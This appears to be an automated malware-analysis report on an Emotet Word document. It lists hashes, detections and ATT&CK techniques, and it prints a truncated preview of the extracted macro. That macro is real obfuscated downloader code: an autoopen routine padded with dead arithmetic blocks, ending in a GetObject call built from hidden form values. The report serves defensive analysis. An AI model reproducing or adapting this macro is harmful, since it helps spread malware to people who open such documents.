Emotet Office (OLE) malware analysis — malicious · 62338c8fa3a628c5

MALICIOUS

Office (OLE)

236.4 KB Created: 2019-04-02 15:02:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: f1d6788c04fd2285861ff321e7f69840 SHA-1: 1c04bb644d4d96a4fd6e7a6ff5a9bdaf2118d266 SHA-256: 62338c8fa3a628c5875f1272b7b6578096dc4e03c5b402c3c9bd1b4fb191f66c

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6922287-0', strongly indicating the Emotet family. The presence of an AutoOpen VBA macro that utilizes GetObject suggests an attempt to execute code. This macro is likely responsible for downloading and executing a secondary payload, a common Emotet tactic.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6922287-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6922287-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34070 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	34070 bytes
SHA-256: `5ccb853a1043ff80b3fca5d1078744dd24e455e2dfb78c845fabf773317f3d35`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DUBAxA1C" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "sGCcQGC" Attribute VB_Base = "0{E48F21A4-E25E-46DD-B29C-3FC3C8831164}{45563A9E-A579-4F28-9D58-2AD67FB1BDFC}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "cXQAAX_" Attribute VB_Base = "0{0FF1F712-F99E-4AFE-B7EF-B278116B2C74}{D461E878-AF2D-4002-98E4-A54BECC37E93}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "iXAQAoUB" Function P1BQBAc() If 685347892 = 465836721 Then jAwQ4co = PAx_wBAA + Int(872513670 * Asc(CoxAwBoC) + JACAAAC1 _ / 760193934) + pD1cXQ / CLng(qDAAA4Qx) - (okCDcko - QA1Ak1AA / 515736157 - Tan _ (BAAAA4D) + (HA1DAc / CSng(kDADkQ) + _ 628627787 / Sgn(668312410) * (kD1AA1CQ + CVar(440692586)))) End If If 556256982 = 171198999 Then K1CZxQ = pAA_ooA + Int(914518761 * Asc(HBkABx) + dcDADBZ _ / 653991142) + zAQA4Ukw / CLng(IBcAAQA) - (tACBQX - uACcwC / 59698149 - Tan _ (MDCAwAAA) + (zAAQAA_A / CSng(RABB_w) + _ 479261298 / Sgn(732657915) * (uA_Z1CAA + CVar(659473347)))) End If End Function Function UAAx4XCA() If 668622730 = 860973434 Then k4AGxQw = LAAAZAD + Int(140046170 * Asc(hBkkAc1) + FA11AoQA _ / 902194132) + oDxZDDD / CLng(wAQDAQUB) - (jAAwwB - iBco_QBA / 568662360 - Tan _ (BQAUBAQ) + (z_AcAUGA / CSng(oCXDAcBA) + _ 867659984 / Sgn(729640376) * (LoC_AQx + CVar(594599142)))) End If If 611394209 = 924002705 Then GQQDBA = ECAAAAA4 + Int(653631988 * Asc(kADAAUAA) + AoxACA _ / 827510914) + BoABcGU / CLng(jAAAAAx) - (GoCUBcQD - zBAwAkAc / 667955069 - Tan _ (nZAGkUX) + (zxwBUc4 / CSng(CAAB4A) + _ 646578554 / Sgn(62567745) * (qCADBA + CVar(365051777)))) End If If 451294204 = 397593678 Then oUAAoAwD = LU4BBB + Int(29834912 * Asc(wQBDcQ) + h_AAAAGc _ / 512704388) + u_AC_DA / CLng(voUAAAA) - (RAcAUBoA - YCBDUA / 250750541 - Tan _ (qUcAQD) + (DcBAXADA / CSng(rAAAUDA) + _ 755215115 / Sgn(518274294) * (wQA4ADQ + CVar(341558933)))) End If End Function Sub autoopen() JUDABAxk End Sub Function JUDABAxk() On Error Resume Next If 524954559 = 694033146 Then zBZAUk = vADXAA4A + Int(50909396 * Asc(oAQXAQ_A) + LGAAAoB4 _ / 327919985) + XDAcCA / CLng(bQZ_QAUX) - (mCCZcG - sAxAXUD / 591440269 - Tan _ (WX1DAwx) + (LBXAUADB / CSng(zDGxZ1U) + _ 941632738 / Sgn(477275187) * (SXBDA_CD + CVar(603234311)))) End If If 572870490 = 713176209 Then zAZAUAGc = ao1XxA + Int(223507896 * Asc(iQXA4_U) + UQwAABDB _ / 148076729) + GZBXBG / CLng(XABAQXok) - (tBUoU4x - kAkAc1G / 394973492 - Tan _ (wUCCo_wB) + (lAA1AAD / CSng(pAXADA) + _ 387925593 / Sgn(338581344) * (SkAAwAwC + CVar(885372181)))) End If If 928101583 = 593705680 Then w14AG_AA = KAooABAX + Int(708239812 * Asc(ko1cAwA) + c_QAcA _ / 768636761) + NUAA4oAU / CLng(DBAo41wA) - (bAcBZAU - ukAAQ_G / 936691701 - Tan _ (VDAoDU) + (iAAAA_CA / CSng(oBAA4CAA) + _ 268913739 / Sgn(527390299) * (wAokAAQ + CVar(351548297)))) End If Set zDUB1A = GetObject(sGCcQGC.cAAUAw.ControlSource + cXQAAX_.lAAAUQ + sGCcQGC.cAAUAw) If 224193205 = 413038928 Then SBC4CxAk = oxD_cAQ + Int(942230367 * Asc(aAcxXAAU) + QccQAAA _ / 959437093) + LAADADwB / CLng(t1xQUk) - (V4cwZoAA - qDABA4 / 561286447 - Tan _ (vABkZZD) + (z_UQA1 / CSng(sxAxxA) + _ 316950408 / Sgn(916257096) * (WAkAcA + CVar(755676757)))) End If If 64324555 = 254697076 Then JXDADAZ = C1DADUA + Int(716349119 * Asc(OCxAAB) + SAwAAAA4 _ / 449378208) + iXCDQA / CLng(JQUBX1) - (WX11_Ao - JABAAQ / 266439163 - Tan _ (FxDB_Ac) + (IGDx4UXZ / CSng(jQ41Qw) + _ 374904340 / Sgn(104014167) * (scABUXA + CVar(101443024))) ... (truncated)

SHA-256: 5ccb853a1043ff80b3fca5d1078744dd24e455e2dfb78c845fabf773317f3d35

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DUBAxA1C"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sGCcQGC"
Attribute VB_Base = "0{E48F21A4-E25E-46DD-B29C-3FC3C8831164}{45563A9E-A579-4F28-9D58-2AD67FB1BDFC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "cXQAAX_"
Attribute VB_Base = "0{0FF1F712-F99E-4AFE-B7EF-B278116B2C74}{D461E878-AF2D-4002-98E4-A54BECC37E93}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "iXAQAoUB"
Function P1BQBAc()
   If 685347892 = 465836721 Then
jAwQ4co = PAx_wBAA + Int(872513670 * Asc(CoxAwBoC) + JACAAAC1 _
/ 760193934) + pD1cXQ / CLng(qDAAA4Qx) - (okCDcko - QA1Ak1AA / 515736157 - Tan _
(BAAAA4D) + (HA1DAc / CSng(kDADkQ) + _
628627787 / Sgn(668312410) * (kD1AA1CQ + CVar(440692586))))
End If
   If 556256982 = 171198999 Then
K1CZxQ = pAA_ooA + Int(914518761 * Asc(HBkABx) + dcDADBZ _
/ 653991142) + zAQA4Ukw / CLng(IBcAAQA) - (tACBQX - uACcwC / 59698149 - Tan _
(MDCAwAAA) + (zAAQAA_A / CSng(RABB_w) + _
479261298 / Sgn(732657915) * (uA_Z1CAA + CVar(659473347))))
End If
End Function
Function UAAx4XCA()
   If 668622730 = 860973434 Then
k4AGxQw = LAAAZAD + Int(140046170 * Asc(hBkkAc1) + FA11AoQA _
/ 902194132) + oDxZDDD / CLng(wAQDAQUB) - (jAAwwB - iBco_QBA / 568662360 - Tan _
(BQAUBAQ) + (z_AcAUGA / CSng(oCXDAcBA) + _
867659984 / Sgn(729640376) * (LoC_AQx + CVar(594599142))))
End If
   If 611394209 = 924002705 Then
GQQDBA = ECAAAAA4 + Int(653631988 * Asc(kADAAUAA) + AoxACA _
/ 827510914) + BoABcGU / CLng(jAAAAAx) - (GoCUBcQD - zBAwAkAc / 667955069 - Tan _
(nZAGkUX) + (zxwBUc4 / CSng(CAAB4A) + _
646578554 / Sgn(62567745) * (qCADBA + CVar(365051777))))
End If
   If 451294204 = 397593678 Then
oUAAoAwD = LU4BBB + Int(29834912 * Asc(wQBDcQ) + h_AAAAGc _
/ 512704388) + u_AC_DA / CLng(voUAAAA) - (RAcAUBoA - YCBDUA / 250750541 - Tan _
(qUcAQD) + (DcBAXADA / CSng(rAAAUDA) + _
755215115 / Sgn(518274294) * (wQA4ADQ + CVar(341558933))))
End If
End Function
Sub autoopen()
JUDABAxk
End Sub
Function JUDABAxk()
On Error Resume Next
   If 524954559 = 694033146 Then
zBZAUk = vADXAA4A + Int(50909396 * Asc(oAQXAQ_A) + LGAAAoB4 _
/ 327919985) + XDAcCA / CLng(bQZ_QAUX) - (mCCZcG - sAxAXUD / 591440269 - Tan _
(WX1DAwx) + (LBXAUADB / CSng(zDGxZ1U) + _
941632738 / Sgn(477275187) * (SXBDA_CD + CVar(603234311))))
End If
   If 572870490 = 713176209 Then
zAZAUAGc = ao1XxA + Int(223507896 * Asc(iQXA4_U) + UQwAABDB _
/ 148076729) + GZBXBG / CLng(XABAQXok) - (tBUoU4x - kAkAc1G / 394973492 - Tan _
(wUCCo_wB) + (lAA1AAD / CSng(pAXADA) + _
387925593 / Sgn(338581344) * (SkAAwAwC + CVar(885372181))))
End If
   If 928101583 = 593705680 Then
w14AG_AA = KAooABAX + Int(708239812 * Asc(ko1cAwA) + c_QAcA _
/ 768636761) + NUAA4oAU / CLng(DBAo41wA) - (bAcBZAU - ukAAQ_G / 936691701 - Tan _
(VDAoDU) + (iAAAA_CA / CSng(oBAA4CAA) + _
268913739 / Sgn(527390299) * (wAokAAQ + CVar(351548297))))
End If
Set zDUB1A = GetObject(sGCcQGC.cAAUAw.ControlSource + cXQAAX_.lAAAUQ + sGCcQGC.cAAUAw)
   If 224193205 = 413038928 Then
SBC4CxAk = oxD_cAQ + Int(942230367 * Asc(aAcxXAAU) + QccQAAA _
/ 959437093) + LAADADwB / CLng(t1xQUk) - (V4cwZoAA - qDABA4 / 561286447 - Tan _
(vABkZZD) + (z_UQA1 / CSng(sxAxxA) + _
316950408 / Sgn(916257096) * (WAkAcA + CVar(755676757))))
End If
   If 64324555 = 254697076 Then
JXDADAZ = C1DADUA + Int(716349119 * Asc(OCxAAB) + SAwAAAA4 _
/ 449378208) + iXCDQA / CLng(JQUBX1) - (WX11_Ao - JABAAQ / 266439163 - Tan _
(FxDB_Ac) + (IGDx4UXZ / CSng(jQ41Qw) + _
374904340 / Sgn(104014167) * (scABUXA + CVar(101443024)))
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.